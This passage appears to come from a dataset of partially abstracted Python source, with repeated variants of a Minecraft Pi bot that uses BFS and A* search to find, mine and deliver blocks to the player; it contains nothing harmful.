    drops = _drops(y_diff, drop)\n
    min_man = float('inf')\n
    for dir_ in _adj_dirs():\n
        loc = player_pos + 2 * dir_\n
        man_dist = _manhattan(bot_plane_pos, (loc.x, loc.z))\n
        if man_dist < min_man:\n
            min_man = man_dist\n
        if man_dist < drops:\n
            return drops\n
    return min_man\n
\n
\n
def _to_my_vec3(vec):\n
    \"\"\"Return the _Vec3 alternative of the Vec3.\"\"\"\n
    return _Vec3(vec.x, vec.y, vec.z)\n
\n
\n
def _player_loc():\n
    \"\"\"Return the player's location.\"\"\"\n
    return _to_my_vec3(_get_mc().player.getTilePos())\n
\n
\n
def _adj_dirs():\n
    \"\"\"Return the adjacent directions.\"\"\"\n
    return [_Vec3(1, 0, 0), _Vec3(-1, 0, 0), _Vec3(0, 0, 1), _Vec3(0, 0, -1)]\n
\n
\n
<function token>\n
\n
\n
def _manhattan(pos1, pos2):\n
    \"\"\"Return the manhattan distance. pos1 and pos2 should be iterable.\"\"\"\n
    return sum(abs(val1 - val2) for val1, val2 in zip(pos1, pos2))\n
\n
\n
<function token>\n
\n
\n
def _key_vals(dict_):\n
    \"\"\"Return a list of key-val tuples.\"\"\"\n
    return [(key, val) for key, val in dict_.iteritems()]\n
", "<docstring token>\n
<import token>\n
<assignment token>\n
\n
\n
class _Vec3(Vec3):\n
    \"\"\"A Vec3 that is hashable. Everything in this program should use this\n
    class.\"\"\"\n
\n
    def __hash__(self):\n
        \"\"\"Return the hash.\"\"\"\n
        return hash((self.x, self.y, self.z))\n
\n
    def clone(self):\n
        \"\"\"Return a clone.\"\"\"\n
        return _Vec3(self.x, self.y, self.z)\n
\n
\n
class _GenericBot:\n
    \"\"\"A generic bot.\"\"\"\n
\n
    def __init__(self, pos, inventory=None):\n
        \"\"\"Initialize with an empty inventory.\n
\n
        inventory is a dictionary. If None, an empty one will be used.\"\"\"\n
        if inventory is None:\n
            self._inventory = {}\n
        else:\n
            self._inventory = deepcopy(inventory)\n
        self._pos = deepcopy(pos)\n
\n
    def take_action(self, action):\n
        \"\"\"Take the action (acquired from _get_legal_actions).\"\"\"\n
        getattr(self, action['func'])(*action.get('args', ()),\n
            **action.get('kwargs', {}))\n
\n
    def take_actions(self, actions, seconds=None):\n
        \"\"\"Take these actions. 
If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n\n def get_pos(self):\n \"\"\"Return the position.\"\"\"\n return deepcopy(self._pos)\n\n def get_legal_actions(self, block_=None):\n \"\"\"Return a list of legal actions.\n\n If block_ is None, return all legal actions. Otherwise, return all\n legal actions that don't involve placing the block.\"\"\"\n return self._get_move_actions(block_) + self._get_mine_actions(\n ) + self._get_placement_actions(block_)\n\n def contains(self, block_):\n \"\"\"Return whether or not the bot contains the block id.\"\"\"\n return block_ in self._inventory\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception(\n 'You requested not to place %s, but it is the only block in the inventory.'\n % exclude)\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n if self._inventory[block_] == 1:\n del self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n self._set_block(loc, block_)\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n\n def _add_to_inv(self, block_):\n \"\"\"Add the block to the inventory.\"\"\"\n if block_ in self._inventory:\n self._inventory[block_] += 1\n else:\n self._inventory[block_] = 1\n\n def _move_up(self, exclude=None):\n \"\"\"Move and place a block below.\n\n If exclude is not None, place a block that is not 'exclude'.\n \"\"\"\n self._move(self._pos + _Vec3(0, 1, 0))\n self._place(self._pos + _Vec3(0, -1, 0), exclude)\n\n def _mine(self, loc):\n \"\"\"Mine the block.\"\"\"\n block_ = self._get_block(loc)\n self._add_to_inv(block_)\n self._set_block(loc, _AIR)\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n 
else:\n
                rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n
                    0),)})\n
        for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n
            if self._get_block(base_pos + vert_dir) not in empty_blocks:\n
                break\n
        else:\n
            pos = base_pos + _Vec3(0, -1, 0)\n
            for _ in xrange(_DROP_PLUS_1):\n
                block_ = self._get_block(pos)\n
                if block_ != _AIR:\n
                    if block_ != _LAVA:\n
                        rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n
                            1, 0),)})\n
                    break\n
                pos.y -= 1\n
        return rtn\n
\n
    def _surrounded(self):\n
        \"\"\"Return whether or not the bot is surrounded by water.\"\"\"\n
        for dir_ in _adj_dirs():\n
            if self._get_block(self._pos + dir_) != _WATER:\n
                return False\n
        return True\n
\n
    def _get_mine_actions(self):\n
        \"\"\"Return a list of legal mining actions (that only involve mining\n
        and not moving).\"\"\"\n
        rtn = []\n
        dont_mine = {_AIR, _WATER, _LAVA}\n
        pos_above = self._pos + _Vec3(0, 2, 0)\n
        if self._get_block(pos_above) not in dont_mine:\n
            rtn.append({'func': '_mine', 'args': (pos_above,)})\n
        for dir_ in _adj_dirs():\n
            pos = self._pos + dir_\n
            for _ in xrange(2):\n
                if self._get_block(pos) not in dont_mine:\n
                    rtn.append({'func': '_mine', 'args': (pos,)})\n
                pos = pos + _Vec3(0, 1, 0)\n
        return rtn\n
\n
    def _get_placement_actions(self, exclude=None):\n
        \"\"\"Return a list of legal actions that only involve placing a block\n
        from the inventory.\n
\n
        exclude is a block id. It is the block that should not be placed. If None,\n
        any block can be placed.\"\"\"\n
        if not self._has_blocks_to_place(exclude=exclude):\n
            return []\n
        dirs = [_Vec3(0, 2, 0)]\n
        for dir_ in _adj_dirs():\n
            dirs.extend([dir_, dir_ + _Vec3(0, 1, 0)])\n
            if self._get_block(self._pos + dir_) in [_AIR, _WATER]:\n
                dirs.append(dir_ + _Vec3(0, -1, 0))\n
        rtn = []\n
        for dir_ in dirs:\n
            pos = self._pos + dir_\n
            if self._can_place(pos):\n
                rtn.append({'func': '_place', 'args': (pos,), 'kwargs': {\n
                    'exclude': exclude}})\n
        return rtn\n
\n
    def _can_place(self, loc):\n
        \"\"\"Return whether or not the bot can place a block at that location\n
        independent of what it has in its inventory.\"\"\"\n
        non_blocks = [_AIR, _WATER, _LAVA]\n
        player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n
        for dir_ in (_adj_dirs() + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n
            new_loc = loc + dir_\n
            if (new_loc not in player and\n
                    self._get_block(new_loc) not in non_blocks):\n
                return True\n
        return False\n
\n
    def _has_blocks_to_place(self, exclude=None):\n
        \"\"\"Return whether or not the bot can place a block from the\n
        inventory. If exclude is None, any block can be placed.\"\"\"\n
        for block_ in self._inventory:\n
            if block_ != exclude:\n
                return True\n
        return False\n
\n
    def _set_block(self, pos, block_):\n
        \"\"\"Set a block. block_ is the block id.\"\"\"\n
        raise NotImplementedError\n
\n
    def _move(self, pos):\n
        \"\"\"Move there only.\"\"\"\n
        self._pos = deepcopy(pos)\n
\n
\n
class _ImaginaryBot(_GenericBot):\n
    \"\"\"A bot used for finding paths that doesn't actually change blocks\n
    in the world.\"\"\"\n
\n
    def __init__(self, pos, inventory=None):\n
        \"\"\"Create a new bot.\"\"\"\n
        _GenericBot.__init__(self, pos, inventory)\n
        self._changes = {}\n
\n
    def _set_block(self, pos, block_):\n
        \"\"\"Set a block. 
block_ is the block id.\"\"\"\n
        self._changes[deepcopy(pos)] = block_\n
\n
    def _get_block(self, pos):\n
        \"\"\"Get the block at the position.\"\"\"\n
        if pos in self._changes:\n
            return self._changes[pos]\n
        else:\n
            return _get_mc().getBlock(pos)\n
\n
    def get_block(self, pos):\n
        \"\"\"The public version.\"\"\"\n
        return self._get_block(pos)\n
\n
    def __hash__(self):\n
        \"\"\"Return the hash.\"\"\"\n
        return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n
            _key_vals(self._changes)))\n
\n
\n
class Bot(_GenericBot):\n
    \"\"\"The real bot.\n
\n
    All vector arguments are Vec3s.\"\"\"\n
    _BOT_BLOCK = block.IRON_BLOCK.id\n
\n
    def __init__(self):\n
        \"\"\"Create a bot next to the player.\"\"\"\n
        pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n
        pos = _Vec3(pos.x, pos.y, pos.z)\n
        _GenericBot.__init__(self, pos)\n
        self._pos = pos\n
        self._move(self._pos)\n
\n
    @staticmethod\n
    def destroy_all():\n
        \"\"\"Destroy all bots within a small distance (in case I forget to\n
        destroy one).\"\"\"\n
        player_loc = _player_loc()\n
        minec = _get_mc()\n
        rad = 10\n
        for x in xrange(player_loc.x - rad, player_loc.x + rad):\n
            for y in xrange(player_loc.y - rad, player_loc.y + rad):\n
                for z in xrange(player_loc.z - rad, player_loc.z + rad):\n
                    if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n
                        minec.setBlock(x, y, z, _AIR)\n
\n
    def destroy(self):\n
        \"\"\"Set itself to air.\"\"\"\n
        self._set_block(self._pos, _AIR)\n
        self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n
\n
    def fetch(self, block_name):\n
        \"\"\"Mine and return a block to the player.\"\"\"\n
        imag_bot = _ImaginaryBot(self._pos, self._inventory)\n
        block_id = getattr(block, block_name).id\n
        block_loc = self._get_block_loc(block_id)\n
        mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n
        mine_actions = astar(mine_prob, _mine_heuristic)\n
        self.take_actions(mine_actions, _DELAY)\n
        imag_bot = _ImaginaryBot(self._pos, self._inventory)\n
        player_loc = _player_loc()\n
        return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n
        return_actions = astar(return_prob, _return_heuristic)\n
        imag_bot.take_actions(return_actions)\n
        return_actions.append({'func': '_place', 'args': ((imag_bot.get_pos() +\n
            player_loc) / 2,), 'kwargs': {'block_': block_id}})\n
        self.take_actions(return_actions, _DELAY)\n
\n
    def _get_block_loc(self, block_id):\n
        \"\"\"Return the location of the block.\"\"\"\n
        find_prob = FindProblem(self._pos, block_id)\n
        dirs = bfs(find_prob)\n
        return self._pos + sum(dirs)\n
\n
    def _set_block(self, pos, block_):\n
        \"\"\"Place an actual block in the world.\n
\n
        block_ is a block id.\"\"\"\n
        _get_mc().setBlock(pos, block_)\n
\n
    def _get_block(self, pos):\n
        \"\"\"Get the block at the position.\"\"\"\n
        return _get_mc().getBlock(pos)\n
\n
    def _move(self, pos):\n
        \"\"\"Move there, and set the appropriate blocks.\"\"\"\n
        self._set_block(self._pos, _AIR)\n
        self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n
        self._set_block(pos, self._BOT_BLOCK)\n
        self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n
        self._pos = pos\n
\n
\n
class FindProblem(SearchProblem):\n
    \"\"\"Problem for finding the location of a block in the world.\n
\n
    A state in this problem is a location.\n
    \"\"\"\n
\n
    def __init__(self, start_loc, block_id):\n
        \"\"\"Initialize.\"\"\"\n
        self._start_loc = deepcopy(start_loc)\n
        self._block_id = block_id\n
\n
    def getStartState(self):\n
        \"\"\"Return the starting location.\"\"\"\n
        return self._start_loc\n
\n
    def isGoalState(self, state):\n
        return _get_mc().getBlock(state) == self._block_id\n
\n
    def getSuccessors(self, state):\n
        \"\"\"Return the successors.\"\"\"\n
        rtn = []\n
        for dir_ in 
_all_dirs():\n
            successor = state + dir_\n
            if (successor.y <= _get_mc().getHeight(successor.x, successor.z) and\n
                    _get_mc().getBlock(successor) != _BEDROCK):\n
                rtn.append((successor, dir_, 1))\n
        return rtn\n
\n
\n
class _MineProblem(SearchProblem):\n
    \"\"\"The problem of finding the block and mining it (not returning\n
    it).\"\"\"\n
\n
    def __init__(self, imag_bot, block_loc, block_id):\n
        \"\"\"Initialize the problem with an _ImaginaryBot.\n
\n
        block_loc is a Vec3.\n
        \"\"\"\n
        self._bot = imag_bot\n
        self._block_loc = deepcopy(block_loc)\n
        self._block_id = block_id\n
\n
    def get_block_loc(self):\n
        \"\"\"Return the block location.\"\"\"\n
        return deepcopy(self._block_loc)\n
\n
    def get_block_id(self):\n
        \"\"\"Return the block it's trying to mine.\"\"\"\n
        return self._block_id\n
\n
    def getStartState(self):\n
        \"\"\"Return the bot passed in.\"\"\"\n
        return self._bot\n
\n
    def isGoalState(self, state):\n
        \"\"\"Return whether or not the bot has the block.\"\"\"\n
        return state.contains(self._block_id)\n
\n
    def getSuccessors(self, state):\n
        \"\"\"Return the successors.\"\"\"\n
        rtn = []\n
        for action in state.get_legal_actions():\n
            successor = deepcopy(state)\n
            successor.take_action(action)\n
            rtn.append((successor, action, 1))\n
        return rtn\n
\n
\n
class _ReturnProblem(SearchProblem):\n
    \"\"\"The problem of returning to the player. This does not place the block\n
    next to the player.\"\"\"\n
\n
    def __init__(self, imag_bot, block_, player_loc):\n
        \"\"\"Initialize the problem with an _ImaginaryBot.\n
\n
        block_ is a block id.\"\"\"\n
        self._bot = imag_bot\n
        self._block = block_\n
        self._player_loc = player_loc\n
\n
    def get_player_loc(self):\n
        \"\"\"Return the player location.\"\"\"\n
        return deepcopy(self._player_loc)\n
\n
    def getStartState(self):\n
        \"\"\"Return the bot passed in.\"\"\"\n
        return self._bot\n
\n
    def isGoalState(self, state):\n
        \"\"\"Return whether or not the bot is next to the player.\"\"\"\n
        diff = state.get_pos() - self._player_loc\n
        return (diff.y == 0 and (diff.x == 0 or diff.z == 0) and\n
            abs(diff.x) + abs(diff.z) == 2 and\n
            state.get_block(self._player_loc + diff / 2 + _Vec3(0, -1, 0))\n
            not in (_AIR, _LAVA, _WATER))\n
\n
    def getSuccessors(self, state):\n
        \"\"\"Return the successors.\"\"\"\n
        rtn = []\n
        for action in state.get_legal_actions(self._block):\n
            successor = deepcopy(state)\n
            successor.take_action(action)\n
            rtn.append((successor, action, 1))\n
        return rtn\n
\n
\n
<function token>\n
<function token>\n
\n
\n
def _return_heuristic(bot, problem):\n
    \"\"\"Return the return heuristic.\n
\n
    bot is an _ImaginaryBot.\n
    \"\"\"\n
    bot_pos = bot.get_pos()\n
    player_pos = problem.get_player_loc()\n
    bot_plane_pos = bot_pos.x, bot_pos.z\n
    y_diff = bot_pos.y - player_pos.y\n
    drop = _DROP if y_diff > 0 else 1\n
    y_diff = abs(y_diff)\n
    drops = _drops(y_diff, drop)\n
    min_man = float('inf')\n
    for dir_ in _adj_dirs():\n
        loc = player_pos + 2 * dir_\n
        man_dist = _manhattan(bot_plane_pos, (loc.x, loc.z))\n
        if man_dist < min_man:\n
            min_man = man_dist\n
        if man_dist < drops:\n
            return drops\n
    return min_man\n
\n
\n
def _to_my_vec3(vec):\n
    \"\"\"Return the _Vec3 alternative of the Vec3.\"\"\"\n
    return _Vec3(vec.x, vec.y, vec.z)\n
\n
\n
def _player_loc():\n
    \"\"\"Return the player's location.\"\"\"\n
    return _to_my_vec3(_get_mc().player.getTilePos())\n
\n
\n
<function token>\n
<function token>\n
\n
\n
def _manhattan(pos1, pos2):\n
    \"\"\"Return the manhattan distance. 
pos1 and pos2 should be iterable.\"\"\"\n return sum(abs(val1 - val2) for val1, val2 in zip(pos1, pos2))\n\n\n<function token>\n\n\ndef _key_vals(dict_):\n \"\"\"Return a list of key-val tuples.\"\"\"\n return [(key, val) for key, val in dict_.iteritems()]\n", "<docstring token>\n<import token>\n<assignment token>\n\n\nclass _Vec3(Vec3):\n \"\"\"A Vec3 that is hashable. Everything in this program should use this\n class.\"\"\"\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash((self.x, self.y, self.z))\n\n def clone(self):\n \"\"\"Return a clone.\"\"\"\n return _Vec3(self.x, self.y, self.z)\n\n\nclass _GenericBot:\n \"\"\"A generic bot.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n\n def take_action(self, action):\n \"\"\"Take the action (acquired from _get_legal_actions).\"\"\"\n getattr(self, action['func'])(*action.get('args', ()), **action.get\n ('kwargs', {}))\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n\n def get_pos(self):\n \"\"\"Return the position.\"\"\"\n return deepcopy(self._pos)\n\n def get_legal_actions(self, block_=None):\n \"\"\"Return a list of legal actions.\n\n If block_ is None, return all legal actions. Otherwise, return all\n legal actions that don't involve placing the block.\"\"\"\n return self._get_move_actions(block_) + self._get_mine_actions(\n ) + self._get_placement_actions(block_)\n\n def contains(self, block_):\n \"\"\"Return whether or not the bot contains the block id.\"\"\"\n return block_ in self._inventory\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception(\n 'You requested not to place %s, but it is the only block in the inventory.'\n % exclude)\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n if self._inventory[block_] == 1:\n del self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n self._set_block(loc, block_)\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n\n def _add_to_inv(self, block_):\n \"\"\"Add the block to the inventory.\"\"\"\n if block_ in self._inventory:\n self._inventory[block_] += 1\n else:\n self._inventory[block_] = 1\n\n def _move_up(self, exclude=None):\n \"\"\"Move and place a block below.\n\n If exclude is not None, place a block that is not 'exclude'.\n \"\"\"\n self._move(self._pos + _Vec3(0, 1, 0))\n self._place(self._pos + _Vec3(0, -1, 0), exclude)\n\n def _mine(self, loc):\n \"\"\"Mine the block.\"\"\"\n block_ = 
self._get_block(loc)\n
        self._add_to_inv(block_)\n
        self._set_block(loc, _AIR)\n
\n
    def _get_move_actions(self, exclude=None):\n
        \"\"\"Return a list of legal movement actions.\n
\n
        exclude is the block to exclude.\n
        \"\"\"\n
        rtn = []\n
        can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n
            _WATER}\n
        if can_move_up:\n
            if self._surrounded():\n
                rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0,\n
                    1, 0),)})\n
            else:\n
                rtn.append({'func': '_move_up', 'args': (exclude,)})\n
        hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n
        if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n
            rtn.append({'func': '_move_down'})\n
        for dir_ in _adj_dirs():\n
            rtn.extend(self._side_moves(dir_, can_move_up))\n
        return rtn\n
\n
    def _side_moves(self, dir_, can_move_up):\n
        \"\"\"Return the list of side moves.\n
\n
        dir_ is an adjacent direction.\n
        can_move_up is a boolean for whether or not the bot can move up.\n
        \"\"\"\n
        rtn = []\n
        base_pos = self._pos + dir_\n
        base_block = self._get_block(base_pos)\n
        empty_blocks = {_AIR, _WATER}\n
        if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n
            for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n
                if self._get_block(base_pos + vert_dir) not in empty_blocks:\n
                    break\n
            else:\n
                rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n
                    0),)})\n
        for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n
            if self._get_block(base_pos + vert_dir) not in empty_blocks:\n
                break\n
        else:\n
            pos = base_pos + _Vec3(0, -1, 0)\n
            for _ in xrange(_DROP_PLUS_1):\n
                block_ = self._get_block(pos)\n
                if block_ != _AIR:\n
                    if block_ != _LAVA:\n
                        rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n
                            1, 0),)})\n
                    break\n
                pos.y -= 1\n
        return rtn\n
\n
    def _surrounded(self):\n
        \"\"\"Return whether or not the bot is surrounded by water.\"\"\"\n
        for dir_ in _adj_dirs():\n
            if self._get_block(self._pos + dir_) != _WATER:\n
                return False\n
        return True\n
\n
    def _get_mine_actions(self):\n
        \"\"\"Return a list of legal mining actions (that only involve mining\n
        and not moving).\"\"\"\n
        rtn = []\n
        dont_mine = {_AIR, _WATER, _LAVA}\n
        pos_above = self._pos + _Vec3(0, 2, 0)\n
        if self._get_block(pos_above) not in dont_mine:\n
            rtn.append({'func': '_mine', 'args': (pos_above,)})\n
        for dir_ in _adj_dirs():\n
            pos = self._pos + dir_\n
            for _ in xrange(2):\n
                if self._get_block(pos) not in dont_mine:\n
                    rtn.append({'func': '_mine', 'args': (pos,)})\n
                pos = pos + _Vec3(0, 1, 0)\n
        return rtn\n
\n
    def _get_placement_actions(self, exclude=None):\n
        \"\"\"Return a list of legal actions that only involve placing a block\n
        from the inventory.\n
\n
        exclude is a block id. It is the block that should not be placed. If None,\n
        any block can be placed.\"\"\"\n
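        # Candidate spots: above the bot's head, beside it at two heights,\n
        # and one below each side that is open (air or water).\n
        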
if not self._has_blocks_to_place(exclude=exclude):\n
            return []\n
        dirs = [_Vec3(0, 2, 0)]\n
        for dir_ in _adj_dirs():\n
            dirs.extend([dir_, dir_ + _Vec3(0, 1, 0)])\n
            if self._get_block(self._pos + dir_) in [_AIR, _WATER]:\n
                dirs.append(dir_ + _Vec3(0, -1, 0))\n
        rtn = []\n
        for dir_ in dirs:\n
            pos = self._pos + dir_\n
            if self._can_place(pos):\n
                rtn.append({'func': '_place', 'args': (pos,), 'kwargs': {\n
                    'exclude': exclude}})\n
        return rtn\n
\n
    def _can_place(self, loc):\n
        \"\"\"Return whether or not the bot can place a block at that location\n
        independent of what it has in its inventory.\"\"\"\n
        non_blocks = [_AIR, _WATER, _LAVA]\n
        player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n
        for dir_ in (_adj_dirs() + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n
            new_loc = loc + dir_\n
            if (new_loc not in player and\n
                    self._get_block(new_loc) not in non_blocks):\n
                return True\n
        return False\n
\n
    def _has_blocks_to_place(self, exclude=None):\n
        \"\"\"Return whether or not the bot can place a block from the\n
        inventory. If exclude is None, any block can be placed.\"\"\"\n
        for block_ in self._inventory:\n
            if block_ != exclude:\n
                return True\n
        return False\n
\n
    def _set_block(self, pos, block_):\n
        \"\"\"Set a block. block_ is the block id.\"\"\"\n
        raise NotImplementedError\n
\n
    def _move(self, pos):\n
        \"\"\"Move there only.\"\"\"\n
        self._pos = deepcopy(pos)\n
\n
\n
class _ImaginaryBot(_GenericBot):\n
    \"\"\"A bot used for finding paths that doesn't actually change blocks\n
    in the world.\"\"\"\n
\n
    def __init__(self, pos, inventory=None):\n
        \"\"\"Create a new bot.\"\"\"\n
        _GenericBot.__init__(self, pos, inventory)\n
        self._changes = {}\n
\n
    def _set_block(self, pos, block_):\n
        \"\"\"Set a block. block_ is the block id.\"\"\"\n
        self._changes[deepcopy(pos)] = block_\n
\n
    def _get_block(self, pos):\n
        \"\"\"Get the block at the position.\"\"\"\n
        if pos in self._changes:\n
            return self._changes[pos]\n
        else:\n
            return _get_mc().getBlock(pos)\n
\n
    def get_block(self, pos):\n
        \"\"\"The public version.\"\"\"\n
        return self._get_block(pos)\n
\n
    def __hash__(self):\n
        \"\"\"Return the hash.\"\"\"\n
        return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n
            _key_vals(self._changes)))\n
\n
\n
class Bot(_GenericBot):\n
    \"\"\"The real bot.\n
\n
    All vector arguments are Vec3s.\"\"\"\n
    _BOT_BLOCK = block.IRON_BLOCK.id\n
\n
    def __init__(self):\n
        \"\"\"Create a bot next to the player.\"\"\"\n
        pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n
        pos = _Vec3(pos.x, pos.y, pos.z)\n
        _GenericBot.__init__(self, pos)\n
        self._pos = pos\n
        self._move(self._pos)\n
\n
    @staticmethod\n
    def destroy_all():\n
        \"\"\"Destroy all bots within a small distance (in case I forget to\n
        destroy one).\"\"\"\n
        player_loc = _player_loc()\n
        minec = _get_mc()\n
        rad = 10\n
        for x in xrange(player_loc.x - rad, player_loc.x + rad):\n
            for y in xrange(player_loc.y - rad, player_loc.y + rad):\n
                for z in xrange(player_loc.z - rad, player_loc.z + rad):\n
                    if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n
                        minec.setBlock(x, y, z, _AIR)\n
\n
    def destroy(self):\n
        \"\"\"Set itself to air.\"\"\"\n
        self._set_block(self._pos, _AIR)\n
        self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n
\n
    def fetch(self, block_name):\n
        \"\"\"Mine and return a block to the player.\"\"\"\n
        imag_bot = _ImaginaryBot(self._pos, self._inventory)\n
        block_id = getattr(block, block_name).id\n
        block_loc = self._get_block_loc(block_id)\n
        mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n
        mine_actions = astar(mine_prob, _mine_heuristic)\n
        self.take_actions(mine_actions, _DELAY)\n
        imag_bot 
= _ImaginaryBot(self._pos, self._inventory)\n
        player_loc = _player_loc()\n
        return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n
        return_actions = astar(return_prob, _return_heuristic)\n
        imag_bot.take_actions(return_actions)\n
        return_actions.append({'func': '_place', 'args': ((imag_bot.get_pos() +\n
            player_loc) / 2,), 'kwargs': {'block_': block_id}})\n
        self.take_actions(return_actions, _DELAY)\n
\n
    def _get_block_loc(self, block_id):\n
        \"\"\"Return the location of the block.\"\"\"\n
        find_prob = FindProblem(self._pos, block_id)\n
        dirs = bfs(find_prob)\n
        return self._pos + sum(dirs)\n
\n
    def _set_block(self, pos, block_):\n
        \"\"\"Place an actual block in the world.\n
\n
        block_ is a block id.\"\"\"\n
        _get_mc().setBlock(pos, block_)\n
\n
    def _get_block(self, pos):\n
        \"\"\"Get the block at the position.\"\"\"\n
        return _get_mc().getBlock(pos)\n
\n
    def _move(self, pos):\n
        \"\"\"Move there, and set the appropriate blocks.\"\"\"\n
        self._set_block(self._pos, _AIR)\n
        self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n
        self._set_block(pos, self._BOT_BLOCK)\n
        self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n
        self._pos = pos\n
\n
\n
class FindProblem(SearchProblem):\n
    \"\"\"Problem for finding the location of a block in the world.\n
\n
    A state in this problem is a location.\n
    \"\"\"\n
\n
    def __init__(self, start_loc, block_id):\n
        \"\"\"Initialize.\"\"\"\n
        self._start_loc = deepcopy(start_loc)\n
        self._block_id = block_id\n
\n
    def getStartState(self):\n
        \"\"\"Return the starting location.\"\"\"\n
        return self._start_loc\n
\n
    def isGoalState(self, state):\n
        return _get_mc().getBlock(state) == self._block_id\n
\n
    def getSuccessors(self, state):\n
        \"\"\"Return the successors.\"\"\"\n
        rtn = []\n
        for dir_ in _all_dirs():\n
            successor = state + dir_\n
            if (successor.y <= _get_mc().getHeight(successor.x, successor.z) and\n
                    _get_mc().getBlock(successor) != _BEDROCK):\n
                rtn.append((successor, dir_, 1))\n
        return rtn\n
\n
\n
class _MineProblem(SearchProblem):\n
    \"\"\"The problem of finding the block and mining it (not returning\n
    it).\"\"\"\n
\n
    def __init__(self, imag_bot, block_loc, block_id):\n
        \"\"\"Initialize the problem with an _ImaginaryBot.\n
\n
        block_loc is a Vec3.\n
        \"\"\"\n
        self._bot = imag_bot\n
        self._block_loc = deepcopy(block_loc)\n
        self._block_id = block_id\n
\n
    def get_block_loc(self):\n
        \"\"\"Return the block location.\"\"\"\n
        return deepcopy(self._block_loc)\n
\n
    def get_block_id(self):\n
        \"\"\"Return the block it's trying to mine.\"\"\"\n
